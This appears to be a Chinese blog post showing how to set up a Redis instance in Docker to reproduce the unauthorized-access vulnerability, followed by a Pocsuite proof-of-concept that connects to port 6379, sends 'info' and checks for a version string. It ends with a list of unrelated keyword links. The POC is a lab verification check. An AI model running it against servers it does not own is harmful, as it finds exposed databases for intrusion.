Redis未授权访问docker复现
发表于:2025-02-02 作者:千家信息网编辑
千家信息网最后更新 2025年02月02日,docker搜索Redis镜像docker search redis拉去镜像到本地docker pull redis查看下载好的镜像docker images运行镜像docker run -p 637
千家信息网最后更新 2025年02月02日Redis未授权访问docker复现
docker搜索Redis镜像
docker search redis
拉去镜像到本地
docker pull redis
查看下载好的镜像
docker images
运行镜像
docker run -p 6379:6379 -d redis
-p
将容器的6379端口映射到主机的6379端口。
-d
将容器后台运行。
查看运行中的镜像
docker ps
POC构成
#!/usr/bin/env python# -*- coding: utf-8 -*-import socketfrom pocsuite.utils import registerfrom pocsuite.poc import Output, POCBaseclass TestPOC(POCBase): vulID = '0' version = '1' author = 'nw01f' vulDate = '2018-10-23' createDate = '2018-10-23' updateDate = '2018-10-23' references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'] name = 'Redis Unauthorized' appPowerLink = 'https://www.redis.io' appName = 'Redis' appVersion = 'All' vulType = 'Unauthorized' desc = ''' redis Unauthorized ''' samples = [''] def _verify(self): result = {} payload = '\x69\x6e\x66\x6f\x0d\x0a' ## info/r/n s = socket.socket() socket.setdefaulttimeout(4) try: host = self.url.split(':')[1].strip('/') if len(self.url.split(':')) > 2: port = int(self.url.split(':')[2].strip('/')) else: port = 6379 s.connect((host, port)) s.send(payload) data = s.recv(1024) if data and 'redis_version' in data: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['port'] = port result['VerifyInfo']['result'] = data[:20] except Exception as e: print e s.close() return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("error") return outputregister(TestPOC)
参考链接
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
镜像
运行
容器
端口
主机
后台
链接
utf-8
参考
搜索
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
软件开发划分成模块的好处
博山公司管理oa软件开发
互联网加高科技的课题名称
网络安全漏洞测试方法
数据库技术与应用考试吗
中万网络安全认证
山东省网络安全测评公司
贪玩热血合击服务器
抚州主机服务器要多少钱
电子购物网站数据库ER图
大国网络安全博弈不单是
软件开发5年在郑州多少工资
提供郑州直销软件开发
微软平台软件开发
乡村网络技术人才
软件开发退税计算比例
网络安全手抄报字少一点的
沙市租房网络安全
西安利通网络技术有限公司
西藏聚酒缘互联网科技有限公司
全国网络安全先进个人事迹
服务器下载限速
网络安全教育工作总结
数据库同步和数据库迁移
mysql删除数据库名称
抚州主机服务器要多少钱
世嘉转为游戏软件开发商
上海网络安全存储芯片
肇庆市新锐互联网科技公司
双路中心管理服务器